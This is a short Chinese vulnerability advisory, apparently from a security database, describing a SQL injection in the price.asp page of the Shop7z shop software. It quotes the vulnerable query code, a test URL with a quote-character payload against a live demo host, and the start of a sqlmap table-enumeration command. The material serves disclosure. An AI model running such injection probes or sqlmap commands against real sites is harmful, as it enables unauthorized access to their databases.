shop7 价格处注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: price.asp 文件注入 ### 详细说明: price.asp文件 96行 ``` if kind<>"" then sql="select pkid,model,productname,smallpicpath,price1,price"&session("customkind")&",kindname,pipai,addtime from view_product where kind like '"&kind&"%' and updown='1' order by pkid desc" else sql="select pkid,model,productname,smallpicpath,price1,price"&session("customkind")&",kindname,pipai,addtime from view_product where updown='1' order by pkid desc" end if ``` demo 测试地址http://www.shop7z.com/demo/price.asp?kind=1%27 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201409/1518411134b43c2fb21217ec35a90c16c94fd0ad.jpg" alt="prices.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/1518411134b43c2fb21217ec35a90c16c94fd0ad.jpg) F:\迅雷下载\sqlmap>python sqlmap.py -u "http://www.shop7z.com/demo/price.asp?kin d=1" --tables _ ___ ___| |_ ___ ___ {1.0-dev-nongit-20140911} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息